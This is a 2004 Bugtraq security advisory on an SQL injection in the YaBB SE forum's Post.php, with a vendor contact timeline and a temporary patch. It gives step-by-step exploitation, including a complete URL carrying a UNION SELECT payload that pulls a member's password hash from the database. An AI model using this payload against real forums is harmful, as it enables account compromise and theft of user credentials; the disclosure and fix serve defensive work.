Date: Mon, 16 Feb 2004 20:34:05 +0100
From: backspace <[email protected]>
To: bugtraq <[email protected]>
Subject: Another YabbSE SQL Injection
Cc: [email protected]
Summary
YaBB SE is a PHP/MySQL port of the popular forum software YaBB (yet another
bulletin board).
An SQL injection vulnerability allows a remote attacker to execute malicious
SQL statements on the database remotely
Details
Vulnerable Systems:
* YaBB SE versions 1.5.4, 1.5.5, possibly others
The file Post.php is vulnerable to SQL injection because the quote parameter
isn't checked against malicious input, so is possible to inject SQL.
How To Exploit the vulnerability:
1- you need to be a registered user to exploit this hole.
2- Click any board you see. ex. General Discussion.
3- Click any message. ex Welcome to YaBB SE!
4- Now view the source code of this page and search this string "sesc"
withou the quotes this is the session id , is an hex number of 32 characters
ex.(13a478d8aa161c2231e6d3b36b6d19f2), you'll need this later
5- now your url is something like this
http://vulnhost/yabbse/index.php?board=1;action=display;threadid=1
6- change your url to look like this.
http://localhost:8080/yabbse//index.php?board=1;sesc=13a478d8aa161c2231e6d3b36b6d19f2;action=post;threadid=1;title=Post+reply;quote=-12)+UNION+SELECT+passwd,null,null,null,null,null,null,null,null+FROM+yabbse_members+where+ID_MEMBER=1/*
the value of sesc is the value you get before from the source code
and voilА you get the hashed password from the user with the id = 1 in the
Subject textBox something like this
Re:e320774659b1b23333bd033754d21bc4
Vendor Status:
january 23, 2004: I contacted the vendor
january 23, 2004: Vendor says they are working on it.
january 29, 2004: I send another email to know how the work was progressing.
No Response.
february 3, 2004 I send another email to know the status of the work.
february 4, 2004 Vendor says the'll figure how to do.
february 16, 2004 I doesn't want to keep waiting, so i publish the
vulnerability.
Temporal Solution:
Open Post.php and go around line 49
you'll see something like this.
$quotemsg = $quote;
change to this.
if ( !is_numeric($quote) )
{
die('Go out C==|=======>');
}
$quotemsg = $quote;
that's it.
Credits go to: BackSpace
